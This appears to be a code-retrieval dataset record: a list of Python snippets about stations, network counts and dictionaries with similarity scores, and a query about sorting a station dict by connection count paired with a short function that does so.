[]\r\n unique_servers = []\r\n unique_network = []\r\n\r\n for vlan in self.list_vlans():\r\n datacenter = vlan['primaryRouter']['datacenter']\r\n name = datacenter['name']\r\n if name not in datacenters:\r\n datacenters[name] = {\r\n 'hardwareCount': 0,\r\n 'networkingCount': 0,\r\n 'primaryIpCount': 0,\r\n 'subnetCount': 0,\r\n 'virtualGuestCount': 0,\r\n 'vlanCount': 0,\r\n }\r\n\r\n datacenters[name]['vlanCount'] += 1\r\n\r\n for hardware in vlan['hardware']:\r\n if hardware['id'] not in unique_servers:\r\n datacenters[name]['hardwareCount'] += 1\r\n unique_servers.append(hardware['id'])\r\n\r\n for net in vlan['networkComponents']:\r\n if net['id'] not in unique_network:\r\n datacenters[name]['networkingCount'] += 1\r\n unique_network.append(net['id'])\r\n\r\n for virtual_guest in vlan['virtualGuests']:\r\n if virtual_guest['id'] not in unique_vms:\r\n datacenters[name]['virtualGuestCount'] += 1\r\n unique_vms.append(virtual_guest['id'])\r\n\r\n datacenters[name]['primaryIpCount'] += \\\r\n vlan['totalPrimaryIpAddressCount']\r\n datacenters[name]['subnetCount'] += len(vlan['subnets'])\r\n\r\n return datacenters", "def observation_space(self) -> Dict[str, Any]:", "def passengers():\n \n # Create session\n session = Session(engine)\n \n # Query\n stations = session.query(Station).count()\n\n return jsonify(stations)", "def device_info(self) -> Dict[str, any]:\n return {\n \"identifiers\": {\n (\n DOMAIN,\n self._api.information.serial,\n SynoSurveillanceStation.INFO_API_KEY,\n )\n },\n \"name\": \"Surveillance Station\",\n \"manufacturer\": \"Synology\",\n \"model\": self._api.information.model,\n \"sw_version\": self._version,\n \"via_device\": (DOMAIN, 
self._api.information.serial),\n }", "def count_minutes(found_devices,base_stations,start=datetime.datetime(2014,1,1),end=datetime.datetime(2015,1,1),resolution=15,stations=range(10),verbose=False):\n\n\tstations_int = list(stations)\n\tstations = [str(station) for station in stations_int]\n\n\n\tminute_count = {}\n\t\n\n\tfor key in found_devices.keys():\n\t\tif found_devices[key]['mac_address'] not in base_stations:\n\t\t\tfound_time = time.localtime(float(found_devices[key]['time']))\n\t\t\tminute = datetime.datetime(found_time.tm_year,found_time.tm_mon,found_time.tm_mday,found_time.tm_hour,int(math.floor((found_time.tm_min/resolution)*resolution)))\n\t\t\tif start <= minute <= end and found_devices[key]['station'] in stations:\n\t\t\t\tif minute not in minute_count.keys():\n\t\t\t\t\tminute_count[minute] = 1\n\n\t\t\t\telse:\n\t\t\t\t\tminute_count[minute] += 1\n\n\n\tfor key,value in minute_count.items():\n\t\tif verbose:\n\t\t\tprint key.strftime('%Y-%m-%d %H:%M'),': ',value\n\tkey = found_devices.keys()[6]\n\t#print minute_count.keys()\n\t#assert 0, '%s\\t%s\\t%s\\t%s'%(len(found_devices),found_devices[key],len(base_stations),len(minute_count))\n\treturn minute_count", "def counts(self):\n\n counts = defaultdict(int)\n\n for i, geom in zip(self.tree_ids, self.tree):\n point_int = list(self.sindex.intersection(geom.bounds))\n if point_int:\n counts[i] += len(point_int)\n\n return dict(counts)", "def get_station_info(config_dict):\n stn_info = dict()\n if config_dict is not None:\n if 'Station' in config_dict:\n stn_info['location'] = weeutil.weeutil.list_as_string(config_dict['Station'].get('location'))\n stn_info['latitude'] = config_dict['Station'].get('latitude')\n stn_info['longitude'] = config_dict['Station'].get('longitude')\n stn_info['altitude'] = config_dict['Station'].get('altitude')\n if 'station_type' in config_dict['Station']:\n stn_info['station_type'] = config_dict['Station']['station_type']\n if stn_info['station_type'] in config_dict:\n stn_info['driver'] = config_dict[stn_info['station_type']]['driver']\n if 'StdReport' in config_dict:\n stn_info['units'] = get_unit_info(config_dict)\n\n return stn_info", "def channels(self,station=[]):\n #{{{ function to return list of valid channels\n chans = {}\n\n if station:\n\n for sta in station:\n if sta in self.stachan_cache:\n\n for ch in self.stachan_cache[sta]:\n\n chans[ch] = 1\n else:\n\n return False\n else:\n\n for st in self.stachan_cache.keys():\n\n for ch in self.stachan_cache[st]:\n\n chans[ch] = 1\n\n return chans.keys()", "def get_num_stations(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n station_stats = text(\r\n \"\"\"\r\n SELECT\r\n count(v.*) as num_stations\r\n FROM indego_rt1130 as v\r\n JOIN philly_zipcode as n\r\n ON ST_Intersects(v.geom, n.geom)\r\n WHERE n.code = :name\r\n \"\"\"\r\n )\r\n resp = engine.execute(station_stats, name=name).fetchone()\r\n return resp[\"num_stations\"]", "def _created_connections(self):\n return len(self._available_connections) + len(self._in_use_connections)", "def get_dict_pairings_lists_lengths(list_of_possible_pairs_lists, graph_instance):\n pairings_lengths_dict = {}\n\n for possible_pairing_list in list_of_possible_pairs_lists:\n\n pairings_list_length = 0\n\n pairings_lengths_dict[tuple(possible_pairing_list)] = pairings_list_length\n\n for pair in possible_pairing_list:\n start_node = pair[0]\n end_node = pair[1]\n\n shortest_route_nodes_list = get_shortest_route_two_nodes(\n start_node, end_node, graph_instance\n )\n shortest_route_edges 
= get_route_edges_from_route(shortest_route_nodes_list)\n total_route_length = get_route_length(\n shortest_route_edges, graph_instance.edges_dict\n )\n pairings_list_length += total_route_length\n pairings_lengths_dict[tuple(possible_pairing_list)] = pairings_list_length\n\n return pairings_lengths_dict", "def station_analysis(data):\n unique_stations = list(set(data['start_station_name'].tolist() + data['end_station_name'].tolist()))\n\n station_counter = {station : 0 for station in unique_stations}\n for index, row in data.iterrows():\n station_counter[row['start_station_name']] += 1\n\n print('List of all stations:')\n print(unique_stations)\n\n keys = list(station_counter.keys())\n vals = list(station_counter.values())\n indexArr = np.argsort(list(station_counter.values()))\n popularStations = []\n for i in reversed(indexArr):\n popularStations.append((keys[i], vals[i]))\n\n stations1, journeys = zip(*popularStations[0:10])\n plt.bar(stations1, journeys, 0.1)\n\n plt.xticks(stations1, rotation='vertical')\n plt.title('Popular stations')\n plt.xlabel('Station names')\n plt.ylabel('Journeys')\n\n plt.show()\n return station_counter", "def tree(self):\n keys = [\n 'FirstTimeSeen',\n 'LastTimeSeen',\n 'channel',\n 'Speed',\n 'Privacy',\n 'Cipher',\n 'Authentication',\n 'Power',\n 'beacons',\n 'IV',\n 'LANIP',\n 'IDlength',\n 'ESSID',\n 'Key']\n\n c_keys = [\n 'Station MAC',\n 'FirstTimeSeen',\n 'LastTimeSeen',\n 'Power',\n 'Packets',\n 'BSSID',\n 'ProbedESSIDs'\n ]\n\n self.update_results()\n aps = {}\n for ap_ in self._aps:\n bssid = ap_.pop(0)\n aps[bssid] = dict(zip(keys, ap_))\n aps[bssid]['clients'] = []\n\n for client in self.clients:\n if client[0] == bssid:\n aps[bssid]['clients'].append(dict(zip(c_keys, client)))\n return aps", "def stations():\n results = session.query(Measurement.station).\\\n group_by(Measurement.station).all()\n\n return jsonify(results)", "def show_nt_msg(nt):\n\n nt_set = set(nt)\n nt_dict = {}\n\n for nt_node in nt_set:\n nt_dict[nt_node] = len(np.where(nt == nt_node)[0])\n\n return nt_dict", "def caculate_network_statistics(self):\n divide_factor_sum = 0 \n for key in self.stars.keys():\n star = self.stars[key]\n if star.nb_num == 0 :\n self.standalone_star_num += 1 \n\n divide_factor = star.nb_num + 2 * (star.spec_num - star.shared_spec_num )/self.ave_starlet_size\n divide_factor_sum += divide_factor\n divide_factor_int = round(divide_factor)\n self.star_divide_factor_dist[divide_factor_int] = self.star_divide_factor_dist.get(divide_factor_int,0) + 1\n if star.spec_num < star.shared_spec_num:\n print(\"!!!!!!!!!!!!Becareful, total spectra No is less than Shared Spectra with starlets\")\n print(\"with star \" + star.id + \" \" + str(star.spec_num) + \"is less than\" + str(star.shared_spec_num))\n if star.spec_num > star.shared_spec_num:\n self.star_lost_spec_num += star.spec_num - star.shared_spec_num\n self.ave_divide_factor_star = divide_factor_sum/self.stars_length\n\n divide_factor_sum = 0 \n for key in self.starlets.keys():\n starlet = self.starlets[key]\n if starlet.nb_num == 0 :\n self.standalone_starlet_num += 1 \n\n divide_factor = starlet.nb_num + 2 * (starlet.spec_num - starlet.shared_spec_num )/self.ave_star_size\n divide_factor_sum += divide_factor\n divide_factor_int = round(divide_factor)\n self.starlet_divide_factor_dist[divide_factor_int] = self.starlet_divide_factor_dist.get(divide_factor_int,0) + 1\n if starlet.spec_num < starlet.shared_spec_num:\n print(\"!!!!!!!!!!!!Becareful, total spectra No is less than Shared Spectra with 
starlets\")\n print(\"with star \" + starlet.id + \" \" + str(starlet.spec_num) + \"is less than\" + str(starlet.shared_spec_num))\n if starlet.spec_num > starlet.shared_spec_num:\n self.starlet_lost_spec_num += starlet.spec_num - starlet.shared_spec_num\n self.ave_divide_factor_starlet = divide_factor_sum/self.starlets_length", "def counts(self) -> dict:\n return Counter(self.sequence)", "def num_requests_sent(self):\n return dict(self._requests_count)", "def _get_shareable_meas_dict(self, last_shared_index):\n meas_dict = {}\n explicit_count = 0\n for i in range(last_shared_index, len(self.ledger)):\n for meas in self.ledger[i][\"meas\"]:\n if self._is_shareable(meas.src_asset, meas.meas_type):\n msg_id = self._get_meas_identifier(meas)\n if msg_id not in meas_dict:\n meas_dict[msg_id] = {\"times\" : [],\"explicit\" : []}\n meas_dict[msg_id][\"times\"].append( meas.stamp )\n if \"implicit\" not in meas.meas_type:\n meas_dict[msg_id][\"explicit\"].append( meas )\n explicit_count += 1\n # print(\"Delta: {} | Explicit Count creating meas dict: {}\".format(self.delta_multiplier, explicit_count))\n return meas_dict", "def summarize(self) -> Mapping[str, int]:\n return dict(\n compounds=self.count_compounds(),\n side_effects=self.count_side_effects(),\n indications=self.count_indications(),\n umls=self.count_umls(),\n )", "def extract_connection_properties(self):\n try:\n localdict = {\"MQTT\" : {\\\n \"address\" : self.config_handle['MQTT']['MQTTBrokerAddress'],\\\n \"port\" : int(self.config_handle['MQTT']['MQTTBrokerPort']),\\\n \"topic\" : self.config_handle['MQTT']['MQTTTopic']},\\\n \"KAFKA\" : {\\\n \"address\" : self.config_handle['Kafka']['KafkaBrokerAddress'],\\\n \"port\" : int(self.config_handle['Kafka']['KafkaBrokerPort']),\\\n \"topic\" : self.config_handle['Kafka']['KafkaTopic']}\\\n }\n self.connection_information.append(localdict)\n except:\n print(\"Error in extracting connection properties\")", "def make_connections(self):\n return\n destinations={}\n sources={}\n for gsq in self.gatesqs:\n destinations[self.local2global(gsq)]=set()\n sources[self.local2global(gsq)]=set()\n if rm.all_sols=='timeout':\n return\n for sol in self.all_sols:\n for sa in sol:\n start,indv,path,covered,end=sa\n destinations[self.local2global(start)].add((self.local2global(end),tuple(path)))\n sources[self.local2global(end)].add((self.local2global(start),tuple(path)))\n self.sources=sources\n self.destinations=destinations", "def operation_counts(self) -> Dict[int, Dict[str, int]]:\n return self._operation_counts", "def properties(self):\n\n dict = {\"Host Name\":self.host, \"Stellar Mass\":self.st_mass,\n \"Stellar Radius\":self.st_rad}\n\n return dict", "def makeGraphDictionary(self):\n graph_dict_incomplete = {}\n # dictionary contains all links, no matter if they are functional\n for i in range(0, len(self._partner_indices)):\n graph_dict_incomplete[i] = set(self._partner_indices[i])\n if self._variant[0] == \"V0_instant\":\n self.graph_dict = graph_dict_incomplete\n else:\n # helper\n link_list = []\n link_list2 = []\n for vertex in graph_dict_incomplete:\n self.setKeyDictionary(dictionary=self.graph_dict,\n key=vertex,\n value=set())\n for neighbour in graph_dict_incomplete[vertex]:\n # Iterate through all plants and the neighbours\n # If a new pair occurs it will be appended in link_list2\n # If the pair occurs again it wll be appended in link_list\n # This means that the link (or rgf process) is finished\n # for both plants\n if {neighbour, vertex} not in link_list2:\n 
link_list2.append({vertex, neighbour})\n else:\n # plants are only put in the dict. if they occur more\n # than once, i.e. both partners have finished rgf\n link_list.append({vertex, neighbour})\n self.setKeyDictionary(dictionary=self.graph_dict,\n key=vertex,\n value=neighbour)", "def stations():\n \n # Query all the stations\n results = session.query(Station).all()\n\n # Create a dictionary to append the station data\n stations_info = []\n for stations in results:\n stations_dict = {}\n stations_dict[\"Station\"] = stations.station\n stations_dict[\"Station Name\"] = stations.name\n stations_dict[\"Latitude\"] = stations.latitude\n stations_dict[\"Longitude\"] = stations.longitude\n stations_dict[\"Elevation\"] = stations.elevation\n all_stations.append(stations_dict)\n \n return jsonify(stations_info)", "def db_info() -> dict[str, int]:\n\n def count(table: str) -> int:\n stmt = f\"SELECT COUNT(*) FROM {table}\"\n cursor = session.execute(stmt)\n result: tuple[int, ...] | None = cursor.fetchone()\n return result[0] if result is not None else 0\n\n info = {\n \"user\": count(\"user\"),\n \"entourage\": count(\"friend\"),\n \"interaction\": count(\"interaction\"),\n \"status\": count(\"status\"),\n \"mention\": count(\"mention\"),\n \"urls\": count(\"link\"),\n \"hashtags\": count(\"hashtag\"),\n }\n return info", "def to_dict(self) -> dict:\n temp = self.algo_state.copy()\n temp.update(\n {\n \"next\": self.next_session,\n \"last\": self.last_session,\n \"pastq\": pack_int_list(self.past_quality),\n \"reps\": self.actual_repetitions,\n \"algo\": self.algo,\n \"sbx\": self.version,\n }\n )\n return temp", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def read_stations(station_file):\n log.info('Reading seiscomp3 exported stations file')\n stations_dict = {}\n with open(station_file, 'r') as csv_file:\n reader = csv.reader(csv_file)\n next(reader) # skip header\n for sta in reader:\n stations_dict[sta[0]] = Station(\n sta[0], float(sta[1]), float(sta[2]), float(sta[3]), sta[4]\n )\n log.info('Done reading seiscomp3 station files')\n return stations_dict", "def get_connection_data() -> Dict[str, Any]:\n conn_info = {\n \"host\": os.environ[\"HOST\"],\n \"port\": os.environ[\"PORT\"]\n }\n return conn_info" ]
[ "0.66026574", "0.6212001", "0.61680955", "0.61130697", "0.60983795", "0.60969037", "0.6081789", "0.6016051", "0.59923977", "0.58641666", "0.5816404", "0.58135796", "0.5811761", "0.5791444", "0.5785143", "0.577446", "0.5770902", "0.57675856", "0.5764687", "0.57554936", "0.5753903", "0.574948", "0.5734664", "0.5732042", "0.5731708", "0.5730051", "0.57246375", "0.57243097", "0.57074004", "0.5702683", "0.5683957", "0.5677825", "0.56634355", "0.56528443", "0.5641211", "0.5639784", "0.5625584", "0.5607324", "0.55960953", "0.5582676", "0.557891", "0.55760634", "0.5573198", "0.5562952", "0.5560744", "0.55526775", "0.5527399", "0.55245125", "0.55220616", "0.55068654", "0.5501996", "0.54838103", "0.54833895", "0.54703647", "0.54654515", "0.5465077", "0.5452919", "0.54498094", "0.544863", "0.54458725", "0.5430243", "0.5424529", "0.54242873", "0.54178303", "0.5409625", "0.5400791", "0.539201", "0.5391046", "0.53859484", "0.53787434", "0.5377072", "0.53679866", "0.53644055", "0.536112", "0.53504336", "0.53430367", "0.53327525", "0.5332685", "0.5332022", "0.53315806", "0.5317594", "0.5315775", "0.5313016", "0.5287644", "0.5287152", "0.5279283", "0.5277042", "0.5273758", "0.5265886", "0.5259422", "0.52587014", "0.5254867", "0.5249123", "0.5248353", "0.52453125", "0.5243178", "0.5226112", "0.52221906", "0.52200115", "0.52169603" ]
0.8745632
0
Sorts the station dict based on the number of connections (value).
def create_station_list(self):
    sorted_station_list = sorted(self.station_dict, key=self.station_dict.get)

    return sorted_station_list
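A standalone illustration of the sorting idiom used above: sorted(d, key=d.get) orders a dict's keys by their values, ascending. The station names and counts are invented for the example.

station_dict = {"Amsterdam": 4, "Utrecht": 6, "Delft": 2}
sorted_station_list = sorted(station_dict, key=station_dict.get)
print(sorted_station_list)  # ['Delft', 'Amsterdam', 'Utrecht'] -- fewest connections first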
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def _get_sorted_by_n_connections(m):\n small = nx.Graph()\n for k, v in m.items():\n small.add_edge(k[0], k[1])\n return sorted(small.adj, key=lambda x: len(small[x])), small", "def _sort_compounds(self):\n self.sorted_molecules = sorted(self.values(), key=operator.attrgetter('criterion'))", "def make_station_dict(self):\n self.station_dict = {}\n\n # interates over stations and puts the amount of connections in the dict\n for station in self.stations:\n length = len(self.stations[station].connections)\n self.station_dict[station] = length\n \n return self.station_dict", "def sort_bike_stations(bike_stations, location):\n\n stations = bike_stations.copy()\n\n for index, station in enumerate(stations):\n station_location = (station[\"lat\"], station[\"lon\"])\n dist = distance.distance(station_location, location).m\n stations[index][\"distance\"] = dist\n\n stations = sorted(stations, key=lambda station: station[\"distance\"])\n stations = list(filter(lambda station: station[\"bikesAvailable\"] > 0, stations))\n\n return stations", "def sortDistance(netlist):\n netlist_dictionary = {}\n for i in range(len(netlist)):\n start = chips[netlist[i][0]]\n end = chips[netlist[i][1]]\n\n delta_x = abs(start[0]-end[0])\n delta_y = abs(start[1]-end[1])\n distance = delta_x + delta_y\n\n netlist_dictionary[(netlist[i][0], netlist[i][1])] = distance\n\n sorted_dictionary = sorted(netlist_dictionary.items(), key=operator.itemgetter(1))\n sorted_netlist = []\n for j in range(len(sorted_dictionary)):\n sorted_netlist.append(sorted_dictionary[j][0])\n\n return sorted_netlist", "def get_top_station_set(city):\n s = {}\n for file in os.listdir(exp_data_path + os.sep + 'station' + os.sep + city):\n with open(exp_data_path + os.sep + 'station' + os.sep + city + os.sep + file) as f:\n reader = csv.reader(f)\n for row in reader:\n if row[0] not in s:\n s[row[0]] = 1\n else:\n s[row[0]] = s[row[0]] + 1\n\n sort_s = dict(sorted(s.items(), key=lambda x : x[1], reverse=True))\n first = True\n res = []\n for k, v in sort_s.items():\n if first:\n top = v\n first = False\n if top - v <= 30:\n res.append(k)\n print('before', len(sort_s))\n print('after', len(res))\n\n # restore new map [old_index, new_index]\n list_remap = {}\n new_index = 0\n for index in range(0, data_length[city]):\n if str(index) in res:\n list_remap[index] = new_index\n new_index = new_index + 1\n\n # print(list_remap)\n check_path(exp_data_path + os.sep + 'station_list')\n file_name = exp_data_path + os.sep + 'station_list' + os.sep + 'list_remap_{}'.format(city) + '.npy'\n if os.path.exists(file_name):\n os.remove(file_name)\n np.save(file_name, list_remap)", "def _topological_sort(self):\n self._reset_topological_order()\n\n def is_connected(src, dst):\n \"\"\"Judge two node whether are connected.\"\"\"\n for precursor in dst.precursor_nodes:\n if src == precursor.split(\":\")[0]:\n return 1\n return 0\n\n idx = 0\n while idx < len(self._topological_order):\n cur_node_name = self._topological_order[idx]\n cur_node = self.get_node(cur_node_name)\n # `scsr` is abbreviation for `successor`.\n for scsr_name in cur_node.successor_nodes:\n scsr_node = self.get_node(scsr_name)\n scsr_node.cur_in_degree -= is_connected(cur_node_name,\n scsr_node)\n if scsr_node.cur_in_degree == 0:\n 
self._topological_order.append(scsr_name)\n idx += 1\n self.sorted = True", "def resort(self):\n self.items.sort(key=lambda node: node.path_weight, reverse=True)", "def sort_values(self):\r\n for loopindex in range(0, self.population_size):\r\n index = self.cost_populations.index(min(self.cost_populations))\r\n \r\n if loopindex < int(self.population_size / 2):\r\n self.best_districts.append(self.district_population[index])\r\n self.best_costs.append(self.cost_populations[index])\r\n else:\r\n self.worst_districts.append(self.district_population[index])\r\n \r\n del self.cost_populations[index]\r\n del self.district_population[index]", "def sortdb():\n return sorted(donor_db.items(), key=sumdbkey, reverse=True)", "def compress(self):\n sorted_table = sorted(self.forwarding_table, reverse=True, key=lambda x: x[\"CIDR\"])\n i = 0\n while i + 1 < len(sorted_table):\n at_i = sorted_table[i]\n at_i_plus = sorted_table[i+1]\n if self.adj_numerically(at_i, at_i_plus) and self.same_attributes(at_i, at_i_plus):\n copy_of_route = self.aggregate_routes(at_i, at_i_plus)\n sorted_table[i] = copy_of_route\n sorted_table.pop(i+1)\n i += 1\n return sorted_table", "def sort_vnet(model, option='traffic'): \n failed_dict = model.failed_dict\n vnet_info = model.get_vnet_info()\n vnets = model.vnets\n vnet_traffic = {}\n for vn in vnets:\n failed_id = failed_dict[vn.vnet_id]\n failed_node_traffic = vnet_info[vn.vnet_id]['traffic'][failed_id][1]\n vnet_traffic[vn] = round(failed_node_traffic, 5)\n sorted_vn = sorted(vnet_traffic.iteritems(), key=operator.itemgetter(1)) \n sorted_vn.reverse()\n return sorted_vn", "def receive_routing_table(self, router):\n for network, distance in router.networks.items():\n # Only if the network doesn't exist in current routing table or\n # current distance is more than new info then add the new info\n if (network not in self.networks or\n self.networks[network] > distance + 1):\n self.networks[network] = distance + 1", "def sort_table(table, sats_table):", "def sorted_streams(streams):\n return sorted(streams, key=lambda s: len(streams[s][\"topic_data\"]), reverse=True)", "def sort_by_default(self):\n self.data.sort()", "def sorted_categories(self):\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l", "def preference_ordering(self) -> None:\n for i in self._destinations:\n self._destinations[i] = sorted(self._destinations[i])", "def sort_by_area():\n # Create a list where index --> neuron and value --> area\n matched = [areas_from_channels[int(c)] for c in channels]\n # Find the indices (aka neurons) where they have a score < 2\n bad_indices = [i for i, score in enumerate(quality) if score[0] < 2]\n # Create a dictionary to sort neurons according to areas\n d = {}\n for index, area in enumerate(matched): # Iterate index and value together\n # Discard bad recordings\n if index not in bad_indices:\n # If the area is already a key then append this neuron index\n if area in d.keys():\n d[area].append(index)\n # Else create a new key for a single element list\n else:\n d[area] = [index]\n return d", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n 
self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n visited.append(smallest_connection.name)\n\n return self.prims_tree", "def dag_topology_sort(self):\n mlist = []\n mod_wrapper = self.mod_wrapper.copy()\n while mod_wrapper:\n temp_list = []\n for mod, wrapper in mod_wrapper.items():\n if wrapper.is_root_mod():\n temp_list.append(mod)\n wrapper.remove_self_from_bindings()\n\n for mod in temp_list:\n mod_wrapper.pop(mod, None)\n\n mlist += temp_list\n\n mod_wrapper_sort = {}\n for mod, i in zip(mlist, range(len(mlist))):\n self.mod_wrapper[mod].set_idx_name(i)\n mod_wrapper_sort[mod] = self.mod_wrapper[mod]\n\n self.mod_wrapper = mod_wrapper_sort", "def _sort_by_flows(stats_values):\n return sorted(stats_values, key=lambda entry: entry.flows, reverse=True)", "def _sort_by_satellite(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n time = []\n satellite = []\n system = []\n for sat in sorted(self.dset.unique(\"satellite\"), reverse=True):\n idx = self.dset.filter(satellite=sat)\n time.extend(self.dset.time.gps.datetime[idx])\n satellite.extend(self.dset.satellite[idx])\n system.extend(self.dset.system[idx])\n \n return np.array([time]), np.array([satellite]), np.array([system])", "def alter_connection_order(connections, order, chip):\n # Sort the connections by distance between gates from shortest to longest\n if order >= 2:\n length_order = {}\n\n for connect in connections:\n reorder = connect.strip(\"\\n\").split(\",\")\n source_coords = [chip.gates[reorder[0]][\"x\"], chip.gates[reorder[0]][\"y\"], 0]\n target_coords = [chip.gates[reorder[1]][\"x\"], chip.gates[reorder[1]][\"y\"], 0]\n gate_dif = abs(source_coords[0] - target_coords[0]) + abs(source_coords[1] - target_coords[1])\n\n # Check if there are 
gates with the same distance\n while gate_dif in length_order:\n gate_dif += .1\n\n length_order[gate_dif] = connect\n\n sort = sorted(length_order)\n connections = [length_order[key] for key in sort]\n\n # Reverse the connections order\n if order == 1 or order == 3:\n connections = connections[::-1]\n\n return connections", "def hubs(self):\r\n cities = col.defaultdict(int)\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n cities[code] += 1\r\n heap = [(-value, key) for key, value in cities.items()]\r\n largest = heapq.nsmallest(5, heap)\r\n largest = [(key, -value) for value, key in largest]\r\n return largest", "def sortby(self):\n ...", "def connected_component_statistics(self, printStats=False):\n lengths = self.connected_component_lengths()\n lengthDict = dict(collections.Counter(lengths))\n\n if printStats:\n orderedLengthDict = collections.OrderedDict(sorted(lengthDict.items()))\n numberOfGroups = nx.number_connected_components(self.return_undirected())\n for k, v in orderedLengthDict.iteritems():\n percent = round((100.00*v / numberOfGroups), 2)\n print str(k) + ' nodes: ' + str(v) + ' (' + str(percent) + '%) groups'\n print '-----------------------------------------'\n print 'TOTAL: ' + str(super(SynonymNetwork, self).number_of_nodes()) + ' nodes in network, ' + str(numberOfGroups) + ' distinct groups'\n else:\n return lengthDict", "def sort_mapping_by_size(cluster_mapping):\r\n\r\n return sorted(cluster_mapping.keys(),\r\n cmp=lambda a, b: cmp(len(a), len(b)),\r\n key=lambda k: cluster_mapping[k], reverse=True)", "def sorted_nodes(self):\r\n def is_source(node, connections):\r\n for connection in connections:\r\n if node == connection[1]:\r\n return False\r\n return True\r\n\r\n def source_connections(node, connections):\r\n conns = set()\r\n for connection in connections:\r\n if node == connection[0]:\r\n conns.add(connection)\r\n return conns\r\n\r\n nodes = set(self.nodes.values())\r\n connections = self.connections.copy()\r\n sorted_nodes = []\r\n\r\n # Find source nodes:\r\n source_nodes = set([n for n in nodes if is_source(n, connections)])\r\n\r\n # while S is non-empty do\r\n while source_nodes:\r\n # remove a node n from S\r\n node = source_nodes.pop()\r\n # insert n into L\r\n sorted_nodes.append(node)\r\n\r\n # for each node m with an edge e from n to m do\r\n s_connections = source_connections(node, connections)\r\n for connection in s_connections:\r\n # remove edge e from the graph\r\n m = connection[1]\r\n connections.remove(connection)\r\n # if m has no other incoming edges then\r\n # insert m into S\r\n if is_source(m, connections):\r\n source_nodes.add(m)\r\n\r\n # if graph has edges then\r\n # output error message (graph has at least one cycle)\r\n # else\r\n # output message (proposed topologically sorted order: L)\r\n\r\n if connections:\r\n raise Exception(\"Steram has at least one cycle (%d connections left of %d)\" % (len(connections), len(self.connections)))\r\n\r\n return sorted_nodes", "def _sort_ns(self):\n n = []\n for layer in self.structure:\n n.append(layer.get_index())\n n = np.asarray(n)\n return n", "def _rank_stations_by_distance_and_quality(lat, lon):\n\n station_ranking = rank_stations(lat, lon)\n station_ranking['enumerated_quality'] = station_ranking['rough_quality'].map(QUALITY_SORT)\n station_ranking = station_ranking.sort_values(by=['distance_meters', 'enumerated_quality'])\n return station_ranking", "def sort_final(y):\n with open(selected_pb, 'w') as outpb:\n pb = []\n for pr in y:\n pb.append({\n \"active\": 
pr[\"active\"],\n \"asn\": pr[\"asn\"],\n \"countrycode\": pr[\"countrycode\"],\n \"id\": pr[\"id\"],\n \"statecode\": pr[\"statecode\"],\n \"meta\": pr[\"meta\"],\n \"dist\": pr[\"dist\"]\n })\n datap = json.dumps(pb)\n outpb.write(datap)\n with open(selected_pb, 'r') as f:\n selected_dist = json.load(f)\n return selected_dist", "def sort_auto(self):\n key = lambda buz1, buz2: buz1 if buz1.trip_duration <= buz2.trip_duration else buz2\n self.autobuze.sort(key=key)", "def sort_links(links):\n\n temp_dict={}\n temp_list=[]\n sorted_list=[]\n ctr=0\n # Open the file where the results is saved and copy the tuple values into an empty list\n h=open('prresults.txt','r')\n for line in h:\n temp_list.append(line)\n #find the comma seperator between the key and the value, and\n #split them, in order to put in dic\n for x in temp_list:\n index=x.find(',')\n key=int(x[0:index])\n val=float(x[index+1:len(x)])\n for y in links:\n if y!= key and ctr==len(links):\n pass\n if y==key:\n temp_dict[key]=val\n break\n #Take dictionary, put it into a list of tuples, \n #then sort based on the pagerank value, rather then key\n sorted_list= temp_dict.items()\n sorted_list.sort(key=lambda x: x[1],reverse=True)\n \n h.close()\n return sorted_list", "def sort_rain_dictionary(raindata_dict_from_urlstream):\n\traindata_from_dictionary_to_sort = raindata_dict_from_urlstream.items() #[ [key, value] for key, value in raindata_dict.items() ] # .items() already gives the unpacking of the dictionary items\n\tsorted_dictionary_raindata = sorted(raindata_from_dictionary_to_sort, reverse=True) # Sort accept a second arguement kyword reverse=True Do not leave space on KEY assignment here only\n\treturn sorted_dictionary_raindata", "def _sort_routes(self):\n sorted_routes = OrderedDict()\n for inp_lab, inp in self.inputs.items():\n if inp_lab not in self.routes:\n continue\n sorted_routes[inp_lab] = OrderedDict()\n for out_lab, out in self.outputs.items():\n if out_lab not in self.routes[inp_lab]:\n continue\n routes = self.routes[inp_lab][out_lab]\n # If multiple 